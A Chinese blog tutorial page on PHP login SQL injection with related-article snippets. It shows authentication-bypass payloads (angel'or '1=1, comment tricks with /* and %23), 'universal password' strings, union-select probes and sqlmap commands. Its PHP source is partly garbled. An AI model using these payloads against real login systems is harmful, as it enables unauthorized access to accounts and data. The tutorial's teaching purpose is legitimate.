php密码注入,一个PHP登陆注入小示例解决方案

最新推荐文章于 2021-04-13 16:59:18 发布
最新推荐文章于 2021-04-13 16:59:18 发布
阅读量324 收藏
点赞数
文章标签: php密码注入

一个PHP登陆注入小示例

在学学习PHP的过程中肯定会听说过SQL注入,简单的讲就是利用后台的SQL代码漏洞来进行一些非法的操作。比如:利用后台代码的漏洞来登陆,用户不用知道真实的用户名和密码也能通过表单提交数据来登陆后台成功。我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如下:

CREATE TABLE `user` (

`userid` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default '',

`password` varchar(20) NOT NULL default '',

PRIMARY KEY (`userid`)

) TYPE=MyISAM AUTO_INCREMENT=3 ;

#

# 导出表中的数据 `user`

#

INSERT INTO `user` VALUES (1, 'angel', 'mypass');

验证用户文件的代码如下:

PHP代码:

SQL Query:$sql

";

?>

这时我们提交:

http://127.0.0.1/injection/user.php?username=angel'or 1=1

就会返回:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:wwwinjectionuser.php on line 13

登陆失败

SQL Query:SELECT * FROM user WHERE username='angel' or 1=1' AND password='

PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:wwwinjectionuser.php on line 13

看到了吗?单引号闭合后,并没有注释掉后面的单引号,导致单引号没有正确配对,所以由此可知我们构造的语句不能让Mysql正确执行,要重新构造:

http://127.0.0.1/injection/user.php?username=angel'or '1=1

这时显示“登陆成功”,说明成功了。或者提交:

http://127.0.0.1/injection/user.php?username=angel'/*

http://127.0.0.1/injection/user.php?username=angel'%23

这样就把后面的语句给注释掉了!说说这两种提交的不同之处,我们提交的第一句是利用逻辑运算,在ASP中运用可以说是非常广泛的,这个不用说了吧?第二、三句是根据mysql的特性,mysql支持/*和#两种注释格式,所以我们提交的时候是把后面的代码注释掉,值得注意的是由于编码问题,在IE地址栏里提交#会变成空的,所以我们在地址栏提交的时候,应该提交%23,才会变成#,就成功注释了,这个比逻辑运算简单得多了,由此可以看出PHP比ASP强大灵活多了。

血汗钱被抢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 登录框注入_sqlmap之(六)----POST登陆注入实战
weixin_30698775的博客
01-19 656
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
php密码注入,php下的SQL注入万能用户名和密码
weixin_39661353的博客
03-09 551
1.针对有单引号的情况 :万能密码 :select * from users where username='xxxx' and password='xxxxxx' or 1='1';万能用户名 :select * from users where username='xxxx' union select * from users/* and password='xxxxx';防止第一种万能密...
登录的php注入,注入PHP登录中防止sql注入方法分析
weixin_30271235的博客
04-13 115
★精品文档★PHP登录中防止sql注入方法分析防止sql注入这些细节问题一般是出现在大意程序员或者是新手程序员了他们未对用户提交过来的数据进行一些非常过滤从而导致给大家测试一下就攻破了你的数据库了下面我来简单的一个用户登录未进行安全配置可能出现的sql注入方法下面一起来看看吧。比如以下一段登录的代码代码如下:if($l [emailprotected]_connect(‘ localho...
php中md5(密码)注入问题
ariel0924的博客
09-27 433
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Document</title> </head> ...
php注入
cnbird's blog
12-08 502
http://www.cndw.com/tech/php/2006041948236.asp
简单的PHP注入类库.zip
07-11
"简单的PHP注入类库"提供了一个有效的解决方案,帮助开发者防止这种攻击。这个类库的目标是过滤GET、POST等请求中的恶意输入,确保SQL查询的安全性。 首先,我们需要理解SQL注入的概念。当用户输入的数据未经验证...
PHP验证解决方案wm-validate-5.x.zip
最新发布
06-06
这个解决方案可能包含一系列类库、函数或者一个框架组件,用于帮助开发者进行用户输入验证、表单验证或其他数据验证任务。下面我们将详细探讨PHP验证的重要性和具体实现方式。 1. **数据验证的重要性** - **安全性...
详解cookie验证的php应用的一种SSO解决办法
10-19
最终,解决方案是让远程服务器提供一个新的PHP文件,专门用于接收SSO请求。这个新文件会去除原登录文件中的登录按钮判断逻辑,直接处理来自本地应用的请求。 以下是一个简化版的`ssologon.php`示例: ```php <?php...
一个比较完善的php购物车类库.zip
07-11
9. **文档和示例**:一个完善的类库还会附带详细的API文档,以及如何在项目中引入和使用的示例代码,帮助开发者快速上手。 压缩包中的文件“17一个比较完善的购物车类”很可能是这个类库的源代码文件,包含了实现...
php依赖注入知识点详解
01-20
下面是一个简单的依赖注入容器的示例: ```php class Container { private $services = array(); function __set($key, $service) { $this->services[$key] = $service; } function __get($key) { return $...
注入总结之万能密码
06-15
适用的网络安全学习资源,PHP+MySql,ASP+Access,ASP+Ms Sql
注入技巧---(登陆一下好吗)
qq_43578176的博客
05-03 263
登陆一下好吗??【3思路】 时间:2018-06-14 00:58:18 来源:taozijun 浏览:(742) (6) 登录一下好吗? 通过这道题提示下寄几:不是所有有关sql语句的注入都要报库名表名字段名!!! 首先打开这道题,是俩输入框,输入1和1有回显,输入union等字符会不显示,想着应该是回显注入 此时应自动脑补sql语句:select * from user where usern...
mysql 密码注入_简单sql注入密码爆破
weixin_42126274的博客
02-27 1379
简介:Day3的练习题和作业简单sql注入(自己搭建一个页面注入)页面搭建使用phpstudy,在WWW目录的index.php中进行代码修改在localhost界面下,即127.0.0.1打开默认显示index.php的页面该页面有如下要求:使用Post方法传递参数链接之前自己已生成的数据库字符型注入页面,要求是post传递的参数,输入id,显示username,age,sex代码如下:1234...
php登录防止注入,php登陆表单防注入练习
weixin_34260080的博客
03-09 247
简单的表单登录代码,了解sql注入,禁止单引号还有反斜杠\ # and or order关键字的提交数据库:简单的源码:后台表单登录页面后台登录帐号:密码://判断有数据才执行后端代码,什么都不输入还是前端登陆界面,防止前端没有数据,后端验证老是弹出if(!empty($_REQUEST)){//数据不为空和空格,赋值账号和密码,都转化为小写,两边去除空格,否则报错$user =...
sql登录注入
陈羽
09-06 462
注入式攻击的详细解释SQL下面我们将以一个简单的用户登陆为例,结合代码详细解释一下SQL注入式攻击,与及他的防范措施。对于一个简单的用户登陆可能的代码如下: try {  string strUserName = this.txtUserName.Text;  string strPwd = this.txtPwd.Text;  string strSql = "select * fro
mysql 密码注入_数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入
weixin_33600816的博客
01-27 593
另类登录注入形式:经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。猜解思路可以构造,user_name: xxx'and password>'a 如果passw...
php前台登录 sql注入_[实战项目]PHP实现登录注册之表单注册功能
weixin_29599245的博客
03-09 205
前言从今天开始,我们要真正编写一点PHP代码了,或许你有些知识掌握的还不够牢固,但是没关系,跟着代码走,多写,多查,只要你对编程感兴趣,你就一定会慢慢成为一个PHPer。image.png提出问题在本章学习之后,你使用了我的代码,又参考了网上一些代码或者教科书上一些代码,发现,咦,为什么书上是mysql而且一直出错?而我用的却是mysqli ?二者有什么区别吗?大有区别,简单来说,mysql_系列...
php怎么注入,php注入方法集锦
weixin_36119965的博客
03-11 516
'%23'andpassWord='mypassid=-1unionselect1,1,1id=-1unionselectchar(97),char(97),char(97)id=1unionselect1,1,1frommembersid=1unionselect1,1,1fromadminid=1unionselect1,1,1fromuserus...
mysql 密码注入_SQL注入原理——万能密码注入
weixin_32259855的博客
02-18 1547
【万能密码】的原理用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Selectuser id,user type,email From users Where user id=’用户名’ And password=’密码’】由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名【a...
轻松掌握动态网站设计:PHP解决方案第2版
书中的每一个PHP解决方案都是建立在前面知识的基础上,快速而轻松地教你PHP基础和数据库设计。随着阅读的深入,你将学会如何编写自己的脚本,或者根据需要修改现有的脚本。一开始就强调了采用安全编码实践来保护网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值